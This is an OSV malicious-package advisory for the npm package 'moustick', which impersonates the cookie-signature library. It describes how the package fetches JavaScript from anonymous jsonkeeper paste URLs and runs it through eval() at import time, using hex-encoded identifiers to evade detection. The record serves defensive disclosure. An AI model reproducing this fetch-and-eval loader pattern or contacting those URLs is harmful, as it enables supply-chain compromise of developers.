OSV ID
MAL-2026-5347
Ecosystem
npm
Summary
Package impersonates the popular cookie-signature library — it copies the description, README, author (TJ Holowaychuk), and repository URL of visionmedia/node-cookie-signature in package.json, while the package itself is published under the unrelated name moustick . On require('moustick') , index.js performs an HTTPS GET to https://www.jsonkeeper.com/b/MYUKZ (an anonymous, mutable paste host) and passes the response field content_o directly to eval() , executing whatever JavaScript the paste currently serves in the consumer's Node process. A helper function g(h) hex-decodes identifiers and assembles a second paste URL https://www.jsonkeeper.com/b/HY6M6 ( hl decodes to ['axios','get','https://www.jsonkeeper.com/b/HY6M6','then']), providing a second remote-fetch primitive and confirming intentional evasion. Any developer who installs this package expecting cookie-signing functionality executes attacker-controlled code at import time; the operator can swap the paste contents at any time to deliver new payloads.
Source: amazon-inspector (deae034e46d94eafe1db97a6a57a664400f03caa48af8f775f6064c361c6bb9a)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.